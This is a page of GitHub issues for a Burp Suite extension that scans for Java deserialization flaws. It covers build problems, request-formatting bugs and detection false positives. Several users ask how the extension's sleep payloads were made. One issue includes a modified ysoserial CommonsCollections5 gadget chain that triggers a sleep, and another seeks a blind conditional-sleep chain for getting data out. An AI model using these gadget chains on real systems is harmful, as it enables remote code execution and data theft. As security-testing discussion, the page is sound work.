
java-deserialization-scanner's Issues

Where can I find the payload source?

Hi Federico,

Sorry to make this an issue; I wasn't able to find your contact details. I found a vulnerable service during a penetration test using your plugin, and I wanted to ask you where I can find the source code of the test payloads. I would like to create a proof-of-concept exploit for the customer.

You say in the description that you expanded on the ysoserial test payloads - how exactly did you do that?

Thanks
Thomas

plain text format payload is needed

It would be really helpful to know what the raw plain-text decoded value of the payload below is. It is used as a payload by the deserialization scanner for Burp on GitHub.


No indication of errors in the manual tab

When there is an error loading ysoserial, in the exploitation tab we can see the corresponding error message, but in the manual tab it just lists every payload as not vulnerable.

How to use the test

sampleCommonsCollections3.war
sampleCommonsCollections4.war
sampleHibernate5.war
sampleJdk7.war
sampleJSON.war
sampleRome.war
sampleSpring.war
How do I get DS to work?
Can you give me the steps for one test case?
Thank you

Scanner detected wrong library

While doing a vulnerable lab the scanner detected RCE using CommonsCollections3 alt payloads 3 and 4 with gzip and base64. Exploitation was failing. A colleague suggested I brute force the library instead of trusting the scan results and I ended up exploiting the lab with CommonsCollections6.

I don't know a ton about java, or these libs, but I wanted to make an issue for this and dig into it, sharing my findings here for others that run into this issue.

Building from source?

Hey there. Thank you for releasing this tool; it seems quite useful and I appreciate the documentation in the README!

My apologies if this is an obvious question, but I'm having some difficulty building this tool from source.

  • I see the JARs one can download via the Releases tab, but I'd like to build from source if possible.
  • I see ant/antbuild.xml - but it seems to expect existing .class files to be in bin/, which it then zips up with JARs in libs/ into the final JAR.

Progress Building from Source

I believe I'm close, as I've compiled the Java source into bin/ with:

$ javac -d bin/ -cp src/burp/*

Then the JAR can be built with:

$ ant -f ant/antbuild.xml

Which successfully builds output/JavaDeserializationScanner_dev.jar.

Observed Errors

However, when I try to add this JAR via Burp Extender, I get the following error:

java.lang.ClassNotFoundException: burp.BurpExtender
	at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
	at java.lang.Class.forName0(Native Method)
	at java.lang.Class.forName(Class.java:348)
	at burp.p3e.a(Unknown Source)
	at burp.p3e.<init>(Unknown Source)
	at burp.vz.a(Unknown Source)
	at burp.dre.run(Unknown Source)
	at java.lang.Thread.run(Thread.java:745)

Environment

  • java - openjdk version "1.8.0_111"
  • javac - javac 1.8.0_111
  • OS - Ubuntu 14.04
  • Burp Suite Pro version 1.7.02beta

Any advice would be much appreciated, thanks!

How are payloads generated?

Hi,

I was wondering, how did you generate the initial payloads, e.g. Hibernate 5 (Sleep). I tried to recreate those by using ysoserial without any luck.

Thank you for your help!

Apache Commons Collections 3 Alternate payload 3 (Sleep) source code

Hello Federico,

Thanks for providing this awesome tool!

I've been testing an application where the only payload that seems to work is Apache Commons Collections 3 Alternate payload 3 (Sleep). All outbound traffic is blocked on my target, so I need to manually modify this payload to sleep conditionally based on variable values / execution results to prove RCE.

However, I can't seem to find the source code for it. I tried all the gadgets in your ysoserial fork with sleep 10 and none of them seem to work for me. Would you mind sharing the source code you used to generate Apache Commons Collections 3 Alternate payload 3?

Thank you,
Alex

How was the Rhino1 (Sleep) payload generated?

Hi Federico,

I have been trying to reverse engineer some of the hard-coded payloads as a learning experience and I am stuck trying to figure out the Rhino1 (Sleep) payload. I attempted to modify the MozillaRhino1 ysoserial payload (actually, the Gadgets.createTemplateImpl) to create a Javassist class that invokes java.lang.Thread.sleep(10000L).

This seems to work but the generated serialized payload is not exactly the same as the one used by the Burp plugin. Just wondering what I might be doing differently or if you have the original in a git repo somewhere :)

Thank you!
~~ Peter

Incorrectly adds CRLF in front of content-length

I have a hard time using the plugin because with Burp Suite v2021.4-6901 the plugin adds a CRLF in front of the tool's own calculated Content-Length. It also does not replace any existing Content-Length.


Java 8 payloads Generation

Hi,

Thank you for awesome extension, it is very helpful.

How did you generate the Java 8 (with no library) payloads? Could you please point me to the tool you used?
ysoserial doesn't have a Java 8 payload.

Thanks.

How to generate Apache Commons Collections 3 Alternate payload 3 (sleep)?

Hello,

How did you manage to generate the payload for "Apache Commons Collections 3 Alternate payload 3"?

I'm trying to execute the example payload and I've seen that it works perfectly. What I mean by that is that the page keeps loading for 10 seconds. (Only with this payload).

I've also seen that the payload has been added in the following commit: c47dda4

Best Regards,
Alex

exploiting tab will not generate the payload

Entering the command Hibernate1 "sleep 5" in the exploiting tab results in ERROR IN YSOSERIAL COMMAND. Entering the same command directly into ysoserial (java -jar /usr/share/java/ysoserial-v0.0.5.jar Hibernate1 "sleep 5") works perfectly.

Error when exploiting - lack of Java 8 support?

Does anyone else have this error when using the latest Burp release, 2020.4, on Windows? After clicking the "Attack" button in the "Exploiting" tab, I encountered the below error message:

Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
	at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
	at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
	at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:45)
	at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
	at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
	at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:148)
	at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:59)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
	at com.nqzero.permit.Permit.<init>(Permit.java:222)
	at com.nqzero.permit.Permit.build(Permit.java:117)
	at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
	... 7 more

I found this is already an open issue for the ysoserial project and can be fixed by using Java 8: (frohoff/ysoserial#136)

I did not use this extension before upgrading to the latest Burp Suite release, but the release notes state that Java 8 is no longer supported: https://portswigger.net/burp/releases/professional-community-2020-4

If other users encounter this error when running the latest Burp release, perhaps we must wait until ysoserial supports newer Java versions.

Help generating a blind payload for Apache Commons Collections 3 Alternate Payload 2

Hi Federico,

First of all, thank you for your amazing scanner! It detected a vulnerability in my pentesting target using the Apache Commons Collections 3 Alternate Payload 2 (and 3) that I certainly would not have found otherwise. I was able to replicate its payload myself by modifying ysoserial's CommonsCollections5.java file based on the code snippet you included in #10.

Unfortunately for me, my target appears to be firewalled and I have been unsuccessful in pinging my host or doing DNS lookups. For this reason, I am hoping to modify the gadget chain in the link above to sleep conditionally, as one might do with blind SQLi. For example, the payload would be of the following structure:

(read current directory name)
(if current directory name starts with "a", sleep 5 seconds)

or more generally

(execute commands to establish if a certain condition is true/false)
(sleep if true)

as opposed to just

(sleep 5 seconds).

I have been unsuccessful in doing this, despite a number of different attempts. I have tried to change one of the InvokerTransformers to a SwitchTransformer (in hopes of defining an appropriate predicate), but regardless of what I change ysoserial throws me a serialization error when I attempt to use my compiled .jar file.

I have also looked at the yolosec blind fork of ysoserial, which includes functionality for such cases. However, my Java knowledge is insufficient to understand the gadget chaining they are doing to the level where I can modify it for my own purposes.

For this reason, I am creating this issue here to ask if you have any advice or sample payloads for creating the above gadget chain using the structure of #10. I recognize blind exfiltration is outside the scope of this scanner, but regardless I would appreciate any input on this issue. Hopefully it can also help others who find a similar issue in their testing.

Thank you for your time!

Different results with different payload encode method

Hi,

When we choose different payload encode methods, we get different results.

If we choose "Attack(Base64)" or "Attack(Ascii Hex)", it will show "Apache Commons Collections 3 Alternate payload 2: NOT vulnerable."

However, if we choose "Attack", the result will show "Apache Commons Collections 3 Alternate payload 2: Potentially VULNERABLE!!!"

Does it indicate a false positive?

In addition, if convenient, could you tell how you generate this default payload? Is it using Commons Collections 5?

Thank you very much.

Invalid Payload makes attack buttons grayed out

Burp Version: Professional 2.0.11beta
Java Deserialization Scanner v0.5
ysoserial-0.0.6-SNAPSHOT-all.jar
compiled (on Windows) as follows:
mvn clean package -DskipTests -Dhibernate5

Noticed a problem where due to a typo, the extension gets into a state where the buttons are grayed out and there is no apparent way to bring them back

To Reproduce:
in "Exploiting" tab, type invalid payload name (like Hibernaee1) and click exploit. Buttons become gray as if it is working but they never come back until I restart Burp or uninstall the extension and re-install it.

Extension is not working with new version of Burp

Hello,

First of all, thank you for creating such a nice extension.

I used Deserialization-Scanner efficiently with applications which are potentially vulnerable to insecure Java deserialization. However, after updating Burp Suite to the recent version, the extension is not working any more.

As proof, an application vulnerable to insecure Java deserialization was tested manually and in the exploiting tab, but the extension did not show that the issue is present. The Burp practice exam, which is definitely vulnerable to insecure Java deserialization, was used as the tested scope.
[image: Manual testing tab]

[image: Exploiting tab]

As I can see, this problem is the same for other users, so the question is: do you support this extension, and can you help users make it work?

Best Regards,
Lilia

ASCII hex generating false positives

The ASCII hex magic selected for detection translates to "aced" in ASCII, which could very well be a variable name or a portion of text in a variable. For example, a variable named "placed" would be detected as a serialized object.

Not sure how to tackle it.
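A stricter detection check of the kind this issue calls for, added here as an illustration and not taken from the extension's code: after each decoding a scanner would try (raw, ASCII hex, base64, URL-safe base64, each optionally gzip-wrapped), it requires the full 4-byte stream header followed by a plausible type code, so hex-looking text that merely contains "aced" no longer matches. The SAMPLES values are constructed for this example.

```python
import base64
import gzip
import re

# Java Object Serialization Stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
MAGIC = b"\xac\xed\x00\x05"

def looks_serialized(data: bytes) -> bool:
    """Full header at offset 0 plus a plausible type code (TC_NULL 0x70 .. TC_ENUM 0x7E).
    Matching only the two bytes 'aced' is what lets text like 'placed' trigger a hit."""
    return data[:4] == MAGIC and len(data) > 4 and 0x70 <= data[4] <= 0x7E

def naive_hex_hit(value: str) -> bool:
    """The loose check the issue describes: 'aced' anywhere in the value."""
    return "aced" in value.lower()

def decode_candidates(value: str):
    """Yield (encoding, bytes) for each decoding a scanner would try on a
    parameter value: raw, ASCII hex, standard base64, URL-safe base64."""
    yield "raw", value.encode("latin-1", "ignore")
    if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", value):
        yield "ascii-hex", bytes.fromhex(value)
    padded = value + "=" * (-len(value) % 4)
    for name, altchars in (("base64", None), ("base64url", b"-_")):
        try:
            yield name, base64.b64decode(padded, altchars=altchars, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not this alphabet
            pass

def _gunzip(data: bytes):
    """Return the inflated bytes if `data` is a gzip member, else None."""
    if data[:2] != b"\x1f\x8b":
        return None
    try:
        return gzip.decompress(data)
    except (OSError, EOFError):
        return None

def classify(value: str):
    """Return the encoding under which `value` carries a Java serialized stream
    ('raw', 'ascii-hex', 'base64', 'base64url', optionally '+gzip'), else None."""
    for name, data in decode_candidates(value):
        if looks_serialized(data):
            return name
        inflated = _gunzip(data)
        if inflated is not None and looks_serialized(inflated):
            return name + "+gzip"
    return None

# Constructed sample: a minimal, well-formed stream, header + TC_BLOCKDATA
# carrying the int 42 (what ObjectOutputStream.writeInt(42) produces).
SAMPLE_STREAM = MAGIC + b"\x77\x04\x00\x00\x00\x2a"
SAMPLES = {
    "ascii-hex": SAMPLE_STREAM.hex(),
    "base64": base64.b64encode(SAMPLE_STREAM).decode(),
    "base64+gzip": base64.b64encode(gzip.compress(SAMPLE_STREAM)).decode(),
    "raw": SAMPLE_STREAM.decode("latin-1"),
}
```

Running classify over SAMPLES returns the encoding name for each, while "placedOrder" and a bare "aced" return None even though naive_hex_hit flags both.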

Question about Burp and the latest version of the extension

Hi,
just a couple of doubts:

  • why does Burp BAPP Store say you need Burp Pro for this extension, when I was able to download it and add the jar manually, and it seems to work?
  • why does the extension say version 0.5 (in the "Show in UI" output in Burp, when I load it), when it should be 0.6? Just a typo?

Cheers.

Java version for each payload

Hello,

I wanted to point out that it would be good to know what version of Java was used to generate each payload. I think that it can help to craft some custom payloads.

Kind regards!

Issue Installing Extension

BApp Version - 1.7.36
While installing the extension you uploaded, after cloning, I am facing an error stating:
BApp Verification failed - The BApp may have been tampered with.

Please resolve this issue.

Error Newlines in headers are not allowed

So... This lab has a Java deserialization in the cookie, which is base64 + URL encoded:
https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-java-deserialization-with-apache-commons
When I send the request to Java Deserialization Scanner, set the cookie as the insertion point, and do manual testing, it cannot find any vulnerability. Burp Logger shows why: all requests return 403 Forbidden with "Newlines in headers are not allowed" in the body.
The funny thing is that if I send the same request to Repeater, it receives a 500 Internal Server Error (correctly).
When I send the JavaDeserializationScanner request from Logger to Comparer, and I compare it with the one from Repeater, I can see the difference: in the one sent by Repeater there is an extra byte %0d before a %0a, exactly between the end of the serialized cookie and the beginning of the next header (Cache-Control). It looks like just by sending the request that received 403 Forbidden from Logger to Repeater, a %0d is added automatically, and that fixes the "Newlines in headers are not allowed" error.
Very weird... not sure why JavaDeserializationScanner fails; I think it's related to setting the insertion point. Even weirder, with an automatic scan (scan insertion points - extensions only) the extension correctly finds the deserialization vulnerability.
Using the latest ysoserial-master-8eb5cbfbf6-1.jar and java 11.

Two errors. 1 newline after Content-length. 2 not removing Content-Length can create problems

Hi.

I love your extension and wonder why this hasn't shown up in the Extender tab yet...

I have encountered two problems in manual scanning:

  1. It doesn't update the Content-Length header if one is already present; another Content-Length header is added instead. This can cause problems with web servers honoring the first and not the second Content-Length header. I've encountered one today :)

  2. A newline is inserted between the last header and Content-Length. This can also cause problems with servers. I've encountered one today as well :)

Please see attached file.

error-with-deserializer
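The three request-building faults reported in this thread and in "Incorrectly adds CRLF in front of content-length" and "Error Newlines in headers are not allowed" (a stranded blank line before Content-Length, a duplicated Content-Length, a bare LF between headers) are all easy to lint for and avoid. The following is an added example, not the extension's code: set_body rebuilds a raw request with exactly one correct Content-Length, and header_problems flags each fault; the four request samples are constructed.

```python
import re

CL = b"content-length:"

def set_body(request: bytes, body: bytes) -> bytes:
    """Replace the body of a raw HTTP/1.1 request and recompute Content-Length.
    Header line endings are normalised to CRLF, an existing Content-Length is
    rewritten in place (a second copy is dropped rather than sent twice), and
    when none exists it is appended inside the header block, so exactly one
    CRLF CRLF separates headers from body."""
    head, sep, _ = request.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no CRLF CRLF separator between headers and body")
    head = head.replace(b"\r\n", b"\n").replace(b"\n", b"\r\n")
    out, seen = [], False
    for line in head.split(b"\r\n"):
        if not line:
            continue                      # never emit an empty header line
        if line.lower().startswith(CL):
            if not seen:
                out.append(b"Content-Length: %d" % len(body))
            seen = True
        else:
            out.append(line)
    if not seen:
        out.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(out) + b"\r\n\r\n" + body

def header_problems(request: bytes) -> list:
    """Lint a raw request for the faults reported against the extension: a bare
    LF inside the header block, a header line stranded after the blank line,
    duplicate Content-Length, or a length that does not match the body sent."""
    head, sep, body = request.partition(b"\r\n\r\n")
    if not sep:
        return ["no-header-body-separator"]
    problems = []
    if b"\n" in head.replace(b"\r\n", b""):
        problems.append("bare-lf")
    if re.match(rb"[A-Za-z0-9-]+:", body):
        problems.append("header-after-blank-line")
    lengths = [l for l in head.split(b"\r\n") if l.lower().startswith(CL)]
    if len(lengths) > 1:
        problems.append("duplicate-content-length")
    if lengths:
        declared = lengths[0].split(b":", 1)[1].strip()
        if not declared.isdigit() or int(declared) != len(body):
            problems.append("content-length-mismatch")
    return problems

# Constructed requests: one correct, three showing the reported faults.
GOOD = b"POST /order HTTP/1.1\r\nHost: app.example\r\nContent-Length: 4\r\n\r\nabcd"
BLANK_BEFORE_CL = b"POST /order HTTP/1.1\r\nHost: app.example\r\n\r\nContent-Length: 4\r\n\r\nabcd"
DUPLICATE_CL = (b"POST /order HTTP/1.1\r\nHost: app.example\r\nContent-Length: 2\r\n"
                b"Content-Length: 4\r\n\r\nabcd")
BARE_LF = b"POST /order HTTP/1.1\r\nHost: app.example\nContent-Length: 4\r\n\r\nabcd"
```

Passing each of the three faulty samples through set_body yields the same well-formed request, and header_problems on that result is empty.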

Question about native Java sleep payload

Hi Federico!
I'm using your scanner and it seems amazing! Thanks for your work.

I'm in a situation in which only the payload "Apache Commons Collections 3 Alternate payload 2" (added in commit 4a29cc3 in src/burp/BurpExtender.java, row 159) of your scanner causes the web application to sleep for 10 seconds, but I'm not able to replicate this payload.

To understand why only the "native sleep payload" fires, I'm trying to craft the chain myself by modifying ysoserial's code. In particular I've tried this chain in CommonsCollections5.java:

public BadAttributeValueExpException getObject(final String command) throws Exception {
    final Transformer transformerChain = new ChainedTransformer(
            new Transformer[]{ new ConstantTransformer(1) });
    final Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Thread.class),
            new InvokerTransformer("getMethod",
                    new Class[]{ String.class, Class[].class },
                    new Object[]{ "sleep", new Class[]{ Long.TYPE } }),
            new InvokerTransformer("invoke",
                    new Class[]{ Object.class, Object[].class },
                    new Object[]{ null, new Object[]{ 10000L } }),
            new ConstantTransformer(1) };
    final Map innerMap = new HashMap();

    final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

    TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

    BadAttributeValueExpException val = new BadAttributeValueExpException(null);
    Field valfield = val.getClass().getDeclaredField("val");
    valfield.setAccessible(true);
    valfield.set(val, entry);

    Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

    return val;
}

This gives me a payload quite identical to yours, but it does not work!

I would like to know how you generated the payload, can you help me?
Many thanks!


needed payload for the vulnerability

I found this Apache Commons Collections 3 Alternate payload 2 (Sleep) as a vulnerability while running Burp. Can I know the command/payload (raw) used for this, or how I can generate the payload using ysoserial?
